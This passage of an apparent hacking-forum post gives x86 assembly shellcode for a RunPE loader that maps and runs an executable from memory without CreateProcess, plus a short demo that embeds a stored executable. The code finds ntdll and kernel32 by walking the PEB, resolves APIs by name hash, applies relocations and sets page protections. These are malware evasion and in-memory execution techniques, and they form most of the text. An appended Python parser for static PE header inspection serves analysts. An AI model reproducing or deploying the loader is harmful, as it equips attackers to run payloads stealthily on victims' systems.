  jmp .set_memory
.no_execute_read:
  mov ebx, [edx+IMAGE_SECTION_HEADER.Characteristics]
  and ebx, IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
  cmp ebx, IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
  jne .no_read_write
  mov eax, PAGE_READWRITE
  mov [.section_flags], eax
  jmp .set_memory
.no_read_write:
  mov ebx, [edx+IMAGE_SECTION_HEADER.Characteristics]
  and ebx, IMAGE_SCN_MEM_READ
  cmp ebx, IMAGE_SCN_MEM_READ
  jne .no_read
  mov eax, PAGE_READONLY
  mov [.section_flags], eax
  jmp .set_memory
.no_read:
  mov eax, PAGE_NOACCESS
  mov [.section_flags],eax
.set_memory:
  mov edx, [pSectionHeader]
  mov eax, [edx + IMAGE_SECTION_HEADER.VirtualAddress]
  add eax, [pBase]
  mov ecx, [APITable]
  lea edi, [.vprotect_ret]
  stdcall DWord [ecx + stAPITable.pVirtualProtect_kernel32], eax, [edx + IMAGE_SECTION_HEADER.VirtualSize], [.section_flags], edi
  test eax, eax
  jz .Exit
  inc [.retval]
.Exit:
  popad
  mov eax, [.retval]
  ret
endp

; walks the PEB loader list (fs:[0x30]) for the ntdll base
proc GetNtdll
  local iResult:DWORD
  push edi
  push esi
  push ebx
  push DWord [fs:0x30]
  pop edi
  mov esi, DWord [edi+0xC]
  push DWord [esi+0x1C]
  pop ebx
  push DWord [ebx+0x8]
  pop DWord [iResult]
  pop ebx
  pop esi
  pop edi
  mov eax, DWord [iResult]
  ret
endp

; walks the PEB loader list for a module whose name starts with 'K' or 'k'
proc GetK32
  local iResult:DWORD
  pusha
  mov ecx, DWord [fs:0x30]
  mov edi, DWord [ecx+0xC]
  mov edi, DWord [edi+0x1C]
.NextModule:
  push DWord [edi+0x8]
  pop DWord [iResult]
  push DWord [edi+0x20]
  pop ebx
  mov edi, DWord [edi]
  movzx eax, Byte [ebx+0x18]
  test eax, eax
  jne .NextModule
  movzx eax, Byte [ebx]
  cmp eax, 0x4b
  je .Found_K32
  cmp eax, 0x6b
  jne .NextModule
.Found_K32:
  popa
  push DWord [iResult]
  pop eax
  ret
endp

; ror-7/xor hash of a zero-terminated string, used to match export names
proc GetHashSz strz
  push edx
  push ecx
  mov edx, DWord [strz]
  push DWORD 0x0
  pop ecx
  push ecx
.CalcHash:
  ror ecx, 7
  xor [esp], ecx
  mov cl, Byte [edx]
  lea edx, [edx+0x1]
  test cl, cl
  jnz .CalcHash
  pop eax
  pop ecx
  pop edx
  ret
endp

; walks a module's export table and returns the function whose name hash matches
proc AltGetProcAddressByHash hLib, fHashProc, iHashVal
  local iResult:DWORD
  pusha
  push DWORD 0x0
  pop DWord [iResult]
  push DWord [hLib]
  pop esi
  movzx ecx, Word [esi]
  cmp ecx, 0x5a4d
  jne .End
  movzx edi, Word [esi+0x3c]
  add edi, esi
  cmp DWord [edi], DWORD 0x4550
  jne .End
  push DWord [edi+0x78]
  pop ecx
  add ecx, esi
  mov ebx, DWord [ecx+0x18]
  push ecx
  push 0x0
  pop edx
  push DWord [ecx+0x20]
  pop eax
  lea eax, [esi+eax]
.MainLoop:
  push DWord [eax]
  pop edi
  add edi, esi
  push eax
  stdcall [fHashProc], edi
  cmp eax, DWord [iHashVal]
  pop eax
  jz .FoundProcname
  lea eax, [eax+0x4]
  lea edx, [edx+0x1]
  sub ebx, 0x1
  or ebx, ebx
  jnz .MainLoop
  pop ecx
  jmp .End
.FoundProcname:
  pop edi
  shl edx, 1
  add edx, DWord [edi+0x24]
  movzx eax, Word [edx+esi]
  shl eax, 2
  add eax, esi
  add eax, DWord [edi+0x1C]
  mov ebx, DWord [eax]
  lea ebx, [esi+ebx]
  push ebx
  pop DWord [iResult]
.End:
  popa
  push DWord [iResult]
  pop eax
  ret
endp

xReloc = sizeof.IMAGE_FILE_HEADER+IMAGE_OPTIONAL_HEADER32.DataDirectory+0x8*IMAGE_DIRECTORY_ENTRY_BASERELOC

; applies the base relocation table to the new image
proc reloc_fixup, dwImageBase:DWORD, pImageFileHeader:DWORD
  pusha
  mov edx, [dwImageBase]
  mov ebx, [pImageFileHeader]
  mov ebx, [ebx + sizeof.IMAGE_FILE_HEADER + IMAGE_OPTIONAL_HEADER32.ImageBase]
  sub edx, ebx                  ; edx -> reloc_correction // delta_ImageBase
  je .end
  test ebx, ebx
  jz .end
  mov eax, [pImageFileHeader]
  mov ebx, [eax+xReloc]
  add ebx, [dwImageBase]
.block:
  mov eax, [ebx + 04h]          ; ImageBaseRelocation.SizeOfBlock
  test eax, eax
  jz .end
  lea ecx, [eax - 008h]
  shr ecx, 001h
  lea edi, [ebx + 008h]
.do_entry:
  movzx eax, word [edi]         ; Entry
  push edx
  mov edx, eax
  shr eax, 00Ch                 ; Type = Entry >> 12
  mov esi, [dwImageBase]        ; ImageBase
  and dx, 0FFFh
  add esi, [ebx]
  add esi, edx
  pop edx
.HIGH:                          ; IMAGE_REL_BASED_HIGH
  dec eax
  jnz .LOW
  mov eax, edx
  shr eax, 010h                 ; HIWORD(Delta)
  jmp .LOW_fixup
.LOW:                           ; IMAGE_REL_BASED_LOW
  dec eax
  jnz .HIGHLOW
  movzx eax, dx                 ; LOWORD(Delta)
.LOW_fixup:
  add word [esi], ax            ; mem[x] = mem[x] + delta_ImageBase
  jmp .next_entry
.HIGHLOW:                       ; IMAGE_REL_BASED_HIGHLOW
  dec eax
  jnz .next_entry
  add [esi],edx                 ; mem[x] = mem[x] + delta_ImageBase
.next_entry:
  inc edi
  inc edi                       ; Entry++
  loop .do_entry
.next_base:
  add ebx, [ebx + 004h]
  jmp .block
.end:
  popa
  ret
endp

; iterates the import descriptors until the all-zero terminator
proc loadImportTable APITable:DWORD, pHashProc:DWORD, image_base:DWORD
  local .import_table:DWORD, .null_directory_entry[sizeof.IMAGE_IMPORT_DESCRIPTOR]:BYTE, .retval:DWORD
  pushad
  xor eax, eax
  inc eax
  mov [.retval], eax
  mov edx, [image_base]
  mov eax, [edx + IMAGE_DOS_HEADER.e_lfanew]
  lea eax, [edx + eax + 4 + sizeof.IMAGE_FILE_HEADER+IMAGE_OPTIONAL_HEADER32.DataDirectory+sizeof.IMAGE_DATA_DIRECTORY]
  mov eax, [eax+IMAGE_DATA_DIRECTORY.VirtualAddress]
  add eax, edx
  mov [.import_table],eax
  lea edi, [.null_directory_entry]
  mov ecx, sizeof.IMAGE_IMPORT_DESCRIPTOR
  mov al, 0h
  rep stosb
  mov ebx, [.import_table]
.next_directory_entry:
  lea esi, [.null_directory_entry]
  mov edi, ebx
  mov ecx, sizeof.IMAGE_IMPORT_DESCRIPTOR
  rep cmpsb
  je .exit_success
  stdcall loadImportDirectoryTable, [APITable], [pHashProc], [image_base], ebx
  test eax, eax
  jz .exit_error
  add ebx, sizeof.IMAGE_IMPORT_DESCRIPTOR
  jmp .next_directory_entry
.exit_success:
  inc [.retval]
.exit_error:
  popad
  mov eax, [.retval]
  ret
endp

; loads one DLL and fills its IAT entries by name hash (ordinal imports are rejected)
proc loadImportDirectoryTable APITable:DWORD, pHashProc:DWORD, image_base:DWORD, directory_entry:DWORD
  local .lookup_table:DWORD, .import_address_table:DWORD, .dll_image_base:DWORD
  pushad
  mov eax, [directory_entry]
  mov eax, [eax+IMAGE_IMPORT_DESCRIPTOR.Name_]
  add eax, [image_base]
  ;load the corresponding dll
  mov ebx, [APITable]
  stdcall DWord [ebx+stAPITable.pLoadLibraryA_kernel32], eax
  test eax,eax
  jz .exit_error
  mov [.dll_image_base],eax
  mov edx, [directory_entry]
  mov eax, [edx+IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk]
  add eax, [image_base]
  mov [.lookup_table], eax
  mov eax, [edx+IMAGE_IMPORT_DESCRIPTOR.FirstThunk]
  add eax, [image_base]
  mov [.import_address_table],eax
  xor ecx, ecx
.next_lookup_entry:
  mov eax, [.lookup_table]
  add eax, ecx
  mov eax, [eax]
  test eax,eax
  jz .exit_success
  mov ebx, eax
  and eax, IMAGE_ORDINAL_FLAG32
  jnz .exit_error
.byname:
  add ebx, [image_base]
  lea ebx, [ebx+IMAGE_IMPORT_BY_NAME.Name_]
  mov eax, ebx
  push ecx
  stdcall GetHashSz, ebx
  stdcall AltGetProcAddressByHash, [.dll_image_base], [pHashProc], eax
  pop ecx
  test eax, eax
  jz .exit_error
  mov ebx, [.import_address_table]
  add ebx, ecx
  mov [ebx], eax
  add ecx, 4
  jmp .next_lookup_entry
.exit_success:
  popad
  mov eax,1
  ret
.exit_error:
  popad
  mov eax,0
  ret
endp

dd _GetDeltaProc

This shellcode can run a PE in memory without the CreateProcess API. The EXE MUST have a relocation table. It takes only one parameter: a pointer to the PE image. To show how it works I added a simple demo.

use32
format PE GUI 4.0
include 'win32a.inc'
include 'pe.inc'
entry start

section '.code' code readable writeable executable

RunPE: file 'RunPE.bin'

start:
  stdcall RunPE, PEFILE

PEFILE: file 'stored_exe.bin'

Source: https://evilzone.org/code-library/%28asm-x86%29-runpe-shellcode/
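For an analyst looking at a sample, the interesting question is what a loader of this shape would do with it before anything runs: does the image carry the base relocation directory the post says is required, what are its preferred base and SizeOfImage, and which page protection would each section end up with under setSection's flag cascade. The parser below, an added example that is not code from the original post, walks exactly the header fields verifyPE, loadFile and setSection read, from a PE32 constructed inline (not a real binary). The function names are mine; the numeric constants are the standard winnt.h values. It reproduces one edge of setSection faithfully: a section without IMAGE_SCN_MEM_READ (for example execute|write only) falls all the way through to PAGE_NOACCESS.

```python
"""Static PE32 header inspection for samples a RunPE-style loader would map.

Added example (not from the original post). Reads only the headers the loader
above uses, so the result can be reviewed without executing anything.
"""
import struct

# Standard winnt.h values.
IMAGE_DIRECTORY_ENTRY_BASERELOC = 5
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B


def page_protection(characteristics):
    """Same cascade as setSection: first matching flag set wins, and anything
    lacking IMAGE_SCN_MEM_READ ends up PAGE_NOACCESS."""
    e, r, w = IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    c = characteristics
    if c & (e | r | w) == (e | r | w):
        return "PAGE_EXECUTE_READWRITE"
    if c & (e | r) == (e | r):
        return "PAGE_EXECUTE_READ"
    if c & (r | w) == (r | w):
        return "PAGE_READWRITE"
    if c & r:
        return "PAGE_READONLY"
    return "PAGE_NOACCESS"


def parse_pe32(data):
    """MZ -> e_lfanew -> 'PE\\0\\0' -> file header -> optional header -> sections,
    the path verifyPE/loadFile take; returns what the loader would rely on."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4                                        # IMAGE_FILE_HEADER
    _machine, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20                                            # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", data, opt)[0] != IMAGE_NT_OPTIONAL_HDR32_MAGIC:
        raise ValueError("not a PE32 optional header")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    size_of_image = struct.unpack_from("<I", data, opt + 56)[0]
    num_dirs = struct.unpack_from("<I", data, opt + 92)[0]   # NumberOfRvaAndSizes
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(num_dirs)]
    reloc = dirs[IMAGE_DIRECTORY_ENTRY_BASERELOC] if num_dirs > IMAGE_DIRECTORY_ENTRY_BASERELOC else (0, 0)

    sections = []
    sect_off = opt + opt_size                                # section table follows the optional header
    for i in range(nsect):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, sect_off + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize,
            "raw_size": rawsize, "raw_offset": rawptr,
            "protection": page_protection(chars),
        })
    return {"image_base": image_base, "size_of_image": size_of_image,
            "entry_rva": entry_rva, "has_relocs": reloc != (0, 0), "sections": sections}


def build_sample_pe32(with_relocs=True):
    """Constructed minimal PE32 (headers plus zero-filled section bodies); not a
    real executable, only enough structure for parse_pe32 to read."""
    sections = [(b".text", 0x1000, 0x60000020), (b".data", 0x2000, 0xC0000040)]
    dirs = [(0, 0)] * 16
    if with_relocs:
        sections.append((b".reloc", 0x3000, 0x42000040))
        dirs[IMAGE_DIRECTORY_ENTRY_BASERELOC] = (0x3000, 0x10)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)       # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt_hdr = struct.pack(
        "<HBB9I6H4IHH6I",
        0x10B, 14, 0,                                       # Magic, linker version
        0x200, 0x400, 0, 0x1000, 0x1000, 0x2000,            # code/data sizes, entry point, bases
        0x400000, 0x1000, 0x200,                            # ImageBase, SectionAlignment, FileAlignment
        6, 0, 0, 0, 6, 0,                                   # OS / image / subsystem versions
        0, 0x4000, 0x200, 0,                                # Win32Version, SizeOfImage, SizeOfHeaders, CheckSum
        2, 0x40,                                            # Subsystem GUI, DllCharacteristics
        0x100000, 0x1000, 0x100000, 0x1000, 0, 16)          # stack/heap, LoaderFlags, NumberOfRvaAndSizes
    opt_hdr += b"".join(struct.pack("<II", va, sz) for va, sz in dirs)
    sect_hdrs = b"".join(
        struct.pack("<8sIIIIIIHHI", name, 0x200, va, 0x200, 0x200 * (i + 1), 0, 0, 0, 0, chars)
        for i, (name, va, chars) in enumerate(sections))
    headers = dos + b"PE\0\0" + file_hdr + opt_hdr + sect_hdrs
    return headers.ljust(0x200, b"\0") + b"\0" * (0x200 * len(sections))


if __name__ == "__main__":
    info = parse_pe32(build_sample_pe32())
    print("base=%#x size=%#x entry_rva=%#x relocs=%s" % (
        info["image_base"], info["size_of_image"], info["entry_rva"], info["has_relocs"]))
    for s in info["sections"]:
        print("%-8s va=%#06x vsize=%#06x -> %s" % (s["name"], s["virtual_address"], s["virtual_size"], s["protection"]))
```

Run on a real sample by replacing `build_sample_pe32()` with the file's bytes; a `has_relocs` of False tells you immediately that a loader of this kind could not rebase the image, and the protection column shows which regions would be left writable and executable at once.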